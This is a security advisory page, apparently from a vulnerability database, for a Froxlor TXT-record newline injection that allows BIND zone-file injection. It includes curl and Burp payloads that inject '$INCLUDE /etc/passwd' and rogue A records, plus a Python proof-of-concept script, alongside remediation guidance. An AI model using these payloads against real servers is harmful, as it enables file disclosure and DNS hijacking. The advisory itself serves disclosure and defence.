Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
Primary rating from Vendor (https://github.com/froxlor/froxlor) · only source for this CVE.
CVSS VectorVendor: https://github.com/froxlor/froxlor
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
Lifecycle Timeline
3DescriptionCVE.org
Summary
The DomainZones.add API endpoint does not sanitize newline characters in TXT record content. An authenticated customer with DNS editing enabled can inject newlines into TXT record values, which break out of the record line in the generated BIND zone file. This enables injection of arbitrary BIND directives ($INCLUDE, $GENERATE) and arbitrary DNS records (A, MX, CNAME) into the zone file written to disk by the DNS rebuild cron.
This is an incomplete fix for CVE-2026-30932 (GHSA-x6w6-2xwp-3jh6), which patched the same newline injection for LOC, RP, SSHFP, and TLSA record types but did not patch TXT records.
Affected Code
lib/Froxlor/Api/Commands/DomainZones.php, lines 306-308:
} elseif ($type == 'TXT' && !empty($content)) {
// check that TXT content is enclosed in " "
$content = Dns::encloseTXTContent($content);
}Dns::encloseTXTContent() (lib/Froxlor/Dns/Dns.php:571-592) only adds or removes surrounding quote characters. It does not strip newlines, carriage returns, or any BIND zone metacharacters.
Line 148 of DomainZones.php still contains:
// TODO regex validate content for invalid charactersThe content flows to the zone file via DnsEntry::__toString() (lib/Froxlor/Dns/DnsEntry.php:83), which concatenates $this->content directly into the zone line followed by PHP_EOL. Embedded newlines in the content produce additional lines in the zone file output.
Comparison with CVE-2026-30932 fix
The v2.3.5 fix for CVE-2026-30932 added validation functions for these types:
| Type | Validation Added | Still Vulnerable? |
|---|---|---|
| LOC | Validate::validateDnsLoc() (strict regex) | No |
| RP | Validate::validateDnsRp() (domain validation) | No |
| SSHFP | Validate::validateDnsSshfp() (3-part split) | No |
| TLSA | Validate::validateDnsTlsa() (4-part split) | No |
| TXT | Dns::encloseTXTContent() (quotes only) | Yes |
PoC
Environment
- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)
- DNS enabled (
system.bind_enable=1,system.dnsenabled=1) - Customer with
dnsenabled=1, domain withisbinddomain=1 - Customer has an API key (or uses the web UI DNS editor with Burp)
Reproduction via API
# Inject $INCLUDE directive to read /etc/passwd
curl -s -u "API_KEY:API_SECRET" \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"domainname": "testdomain.lab",
"type": "TXT",
"record": "@",
"content": "v=spf1 +all\"\n$INCLUDE /etc/passwd",
"ttl": 18000
}
}' \
https://panel.example.com/api.phpReproduction via Web UI (Burp)
- Log in as a customer with DNS editing enabled
- Navigate to Resources > Domains > (domain) > DNS Editor
- Add a new record: Type = TXT, Record = @, Content = any
- Intercept the POST request in Burp Suite
- Change the
dns_contentparameter to:v=spf1 +all"%0a$INCLUDE /etc/passwd
(%0a is URL-encoded newline)
- Forward the request
Result
The API returns the generated zone content. The TXT record line is split at the newline, and $INCLUDE /etc/passwd appears on its own line as a BIND directive:
$TTL 604800
$ORIGIN testdomain.lab.
@ 604800 IN SOA froxlor.lab admin.froxlor.lab. 2026041004 ...
@ 18000 IN TXT "v=spf1 +all"
$INCLUDE /etc/passwd"
@ 604800 IN A 100.95.188.127
* 604800 IN A 100.95.188.127When the DNS rebuild cron runs, BIND processes the $INCLUDE directive and attempts to read /etc/passwd.
Variant: Arbitrary DNS record injection
The same technique injects arbitrary A/MX/CNAME records:
curl -s -u "API_KEY:API_SECRET" \
-H 'Content-Type: application/json' \
-d '{
"command": "DomainZones.add",
"params": {
"domainname": "testdomain.lab",
"type": "TXT",
"record": "_spf",
"content": "v=spf1 +all\"\nevil\t18000\tIN\tA\t6.6.6.6",
"ttl": 18000
}
}' \
https://panel.example.com/api.phpResult:
_spf 18000 IN TXT "v=spf1 +all"
evil 18000 IN A 6.6.6.6evil.testdomain.lab now resolves to attacker IP 6.6.6.6.
Automated PoC Script
#!/usr/bin/env python3
"""Froxlor <= 2.3.5 TXT Zone Injection - Incomplete CVE-2026-30932 Fix"""
import json, sys, requests, urllib3
urllib3.disable_warnings()
def api(target, key, secret, cmd, params=None):
return requests.post(f"{target.rstrip('/')}/api.php",
auth=(key, secret), json={"command": cmd, "params": params or {}},
verify=False).json()
target, key, secret, domain = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
# Inject $INCLUDE
r = api(target, key, secret, "DomainZones.add", {
"domainname": domain, "type": "TXT", "record": "@",
"content": 'v=spf1 +all"\n$INCLUDE /etc/passwd', "ttl": 18000})
for line in r.get("data", []):
tag = " <-- INJECTED" if "$INCLUDE" in str(line) else ""
if line: print(f" {line}{tag}")
print("\nCONFIRMED" if any("$INCLUDE" in str(l) for l in r.get("data",[])) else "FAILED")Usage: python3 poc.py https://panel.example.com API_KEY API_SECRET domain.tld
Impact
- Information Disclosure:
$INCLUDEdirects BIND to read arbitrary world-readable files on the server. The included content is parsed as zone data and can be retrieved by the customer viaDomainZones.listingor DNS queries to records created from parsed file lines. - DNS Record Injection: Newline breakout allows injection of A, MX, CNAME, and other records into the zone file. A customer can point subdomains to attacker-controlled IPs, intercept email via MX injection, or perform subdomain takeover via CNAME injection.
- DNS Service Disruption: Malformed zone content causes BIND to reject the zone, creating a DNS outage for the affected domain.
$GENERATEdirectives can create massive record sets for amplification.
Suggested Fix
Strip newlines and BIND metacharacters from TXT content. Minimal fix:
// lib/Froxlor/Api/Commands/DomainZones.php, around line 306
} elseif ($type == 'TXT' && !empty($content)) {
// Strip characters that can break zone file format
$content = str_replace(["\n", "\r", "\t"], '', $content);
$content = Dns::encloseTXTContent($content);
}A more comprehensive fix would add a validation function (similar to validateDnsLoc, validateDnsSshfp, etc.) that rejects any content containing zone metacharacters ($, newlines), and remove the TODO at line 148.
AnalysisAI
Authenticated zone-file injection in Froxlor <=2.3.6 allows a customer with DNS editing enabled to inject newline characters into TXT record content via the DomainZones.add API, breaking out of the record line in the generated BIND zone file and injecting arbitrary BIND directives ($INCLUDE, $GENERATE) or DNS records (A, MX, CNAME). The flaw is an incomplete fix for CVE-2026-30932, which sanitized LOC/RP/SSHFP/TLSA records but left TXT handling reliant only on Dns::encloseTXTContent(), which strips no control characters. Publicly available exploit code exists (detailed PoC including a Python script in the GHSA advisory), but there is no public exploit identified at time of analysis in CISA KEV and no EPSS score was provided.
Technical ContextAI
Froxlor is a PHP-based open-source server management panel (packaged as composer/froxlor/froxlor) used to provision web hosting, mail, and DNS services backed by BIND. The vulnerable code path is lib/Froxlor/Api/Commands/DomainZones.php lines 306-308, where TXT content is passed through Dns::encloseTXTContent() (lib/Froxlor/Dns/Dns.php:571-592), a routine that only normalizes surrounding double quotes. The sanitized value flows into DnsEntry::__toString() (lib/Froxlor/Dns/DnsEntry.php:83), which concatenates the attacker-controlled string directly into the zone line followed by PHP_EOL; embedded \n or \r therefore produces additional lines in the BIND zone file written by the DNS rebuild cron. This is a textbook CWE-74 (improper neutralization of special elements in output used by a downstream component) - the downstream component being BIND's zone-file parser, which honors $INCLUDE and $GENERATE directives present at line start. The matching v2.3.5 patch for CVE-2026-30932 added per-type validation functions (validateDnsLoc, validateDnsRp, validateDnsSshfp, validateDnsTlsa) but never reached TXT, and a TODO comment at DomainZones.php:148 (// TODO regex validate content for invalid characters) was left in place.
RemediationAI
Vendor-released patch: upgrade to Froxlor 2.3.7, which per the release notes at https://github.com/froxlor/froxlor/releases/tag/2.3.7 explicitly 'remove[s] invalid control characters in every dns content-field' (see also advisory GHSA-37m5-m4q3-fc6x). If immediate upgrade is not possible, apply the maintainer-suggested minimal fix in lib/Froxlor/Api/Commands/DomainZones.php around line 306 by inserting $content = str_replace(["\n","\r","\t"], '', $content); before the call to Dns::encloseTXTContent(); a more comprehensive in-place fix is to add a validateDnsTxt() helper that rejects any content containing $ or newline characters and to remove the TODO comment at line 148. As a configuration-level workaround for operators who cannot patch, disable customer DNS editing by setting customer dnsenabled=0 or globally setting system.dnsenabled=0 - trade-off: customers lose the ability to manage their own zones; alternatively, restrict access to /api.php and the web DNS editor so only trusted staff can submit DomainZones.add/update requests, accepting the operational overhead of staff-mediated DNS changes.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-34313
GHSA-37m5-m4q3-fc6x